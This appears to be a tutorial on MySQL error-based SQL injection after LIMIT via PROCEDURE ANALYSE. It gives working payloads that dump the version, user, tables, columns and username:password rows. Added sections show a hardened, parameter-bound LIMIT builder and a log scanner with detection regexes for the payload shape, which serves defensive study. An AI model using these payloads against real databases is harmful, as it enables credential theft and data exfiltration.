First, a look at the ANALYSE procedure: it analyses the result of a SELECT query and returns an optimisation suggestion for each column.

Here it is mainly used to run our error-based and time-based statements.

This is a normal query:

mysql> select * from user;
+----+----------+----------+
| id | email    | password |
+----+----------+----------+
|  1 | 1@qq.com | 123456   |
|  2 | 2@qq.com | 123456   |
|  3 | 3@qq.com | 123456   |
+----+----------+----------+
3 rows in set (0.01 sec)

Error-based injection after LIMIT:

mysql> select * from admin order by id limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.32'
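The payload above only works because the text after LIMIT is pasted into the query as-is. The following is an added example (not code from the original post) showing the vulnerable query builder next to a hardened one; it assumes a hypothetical application that receives the offset and count as a single "offset,count" parameter, and the attacker string is constructed from the statement above.

```python
# Added example: a LIMIT clause built by concatenation versus one built from validated integers.
import re
from typing import Tuple

# Constructed sample inputs (hypothetical application parameter "offset,count").
NORMAL_INPUT = "0,1"
ATTACKER_INPUT = "0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)"


def build_query_vulnerable(limit_param: str) -> str:
    """String concatenation: anything after the digits becomes part of the SQL text."""
    return f"select * from user order by id limit {limit_param}"


def parse_limit(limit_param: str, max_rows: int = 100) -> Tuple[int, int]:
    """Accept only '<offset>,<count>' made of digits, bounded, and return integers.

    Raises ValueError for anything else, so no SQL keyword can ride in on this parameter.
    """
    m = re.fullmatch(r"\s*(\d{1,9})\s*,\s*(\d{1,9})\s*", limit_param)
    if not m:
        raise ValueError("limit parameter must be '<offset>,<count>' with digits only")
    offset, count = int(m.group(1)), int(m.group(2))
    if count == 0 or count > max_rows:
        raise ValueError(f"count must be between 1 and {max_rows}")
    return offset, count


def build_query_hardened(limit_param: str) -> Tuple[str, Tuple[int, int]]:
    """Return a statement with placeholders plus the values to bind (cursor.execute(sql, params)).

    The driver binds the two values as integers, never as SQL text, so a
    'procedure analyse(...)' suffix is rejected by parse_limit before any SQL is built.
    """
    offset, count = parse_limit(limit_param)
    return "select * from user order by id limit %s, %s", (offset, count)


if __name__ == "__main__":
    print(build_query_vulnerable(ATTACKER_INPUT))   # the injected clause survives intact
    print(build_query_hardened(NORMAL_INPUT))
    try:
        build_query_hardened(ATTACKER_INPUT)
    except ValueError as exc:
        print("rejected:", exc)
```

The check is deliberately an allow-list on shape (digits, a comma, an upper bound) rather than a deny-list of keywords such as `procedure`; a deny-list would have to chase every spelling and comment trick, while the allow-list leaves nothing for a payload to attach to.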

Statements for dumping data

User:

select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,user()),0),1);

Tables:

select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0),1);

Columns:

select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='injection' limit 0,1)),0),1);

Data:

select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat_ws(':',id,username,password) from injection limit 0,1)),0),1);
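All four statements share one shape: `procedure analyse(` wrapping `updatexml(` or `extractvalue(`, usually with an `information_schema` read inside. That shape is easy to pick out of the MySQL general query log (or a proxy's query log). The following is an added example, not part of the original post, that scans constructed general-log lines for it; the log lines are made up to match the statements above and the MySQL 5.x general-log layout (timestamp, thread id, `Query`, statement). PROCEDURE ANALYSE was removed in MySQL 8.0, so on the 5.x servers where these payloads apply, the clause appearing in application traffic at all is worth a review.

```python
# Added example: flag the post's payload shape in MySQL general-log lines.
import re
from typing import Dict, List

# Constructed sample log (not captured from a real server), in general-log format.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t   7 Query\tselect * from user
2024-05-01T10:00:02.000000Z\t   7 Query\tselect * from user order by id limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
2024-05-01T10:00:03.000000Z\t   9 Query\tselect * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0),1)
2024-05-01T10:00:04.000000Z\t  11 Query\tselect id, email from user procedure analyse()
2024-05-01T10:00:05.000000Z\t  11 Query\tselect * from user order by id limit 0,1
"""

GENERAL_LOG = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) Query\t(?P<sql>.*)$")
PROC_ANALYSE = re.compile(r"procedure\s+analyse\s*\(", re.I)
XML_ERROR_FUNC = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
SCHEMA_READ = re.compile(r"\binformation_schema\.", re.I)


def classify(sql: str) -> List[str]:
    """Return the reasons a statement is suspicious; empty list means nothing to flag."""
    reasons: List[str] = []
    if not PROC_ANALYSE.search(sql):
        return reasons
    if XML_ERROR_FUNC.search(sql):
        reasons.append("procedure analyse wrapping extractvalue/updatexml (error-based payload)")
    if SCHEMA_READ.search(sql):
        reasons.append("information_schema read inside procedure analyse")
    if not reasons:
        # Bare PROCEDURE ANALYSE() is a tuning aid; rare in application traffic, so review it.
        reasons.append("procedure analyse present (low: review, legitimate use is rare in app traffic)")
    return reasons


def scan_log(text: str) -> List[Dict]:
    """Parse general-log lines and collect flagged statements with thread id and reasons."""
    findings: List[Dict] = []
    for line in text.splitlines():
        m = GENERAL_LOG.match(line)
        if not m:
            continue  # continuation lines or non-Query entries
        reasons = classify(m.group("sql"))
        if reasons:
            findings.append({
                "ts": m.group("ts"),
                "thread": int(m.group("thread")),
                "sql": m.group("sql"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], "thread", f["thread"])
        for r in f["reasons"]:
            print("   -", r)
```

Pairing these hits with the server's error-log entries for `ERROR 1105 ... XPATH syntax error` on the same thread id ties the attempt to the response the attacker actually saw, since the error text is what carries the extracted value.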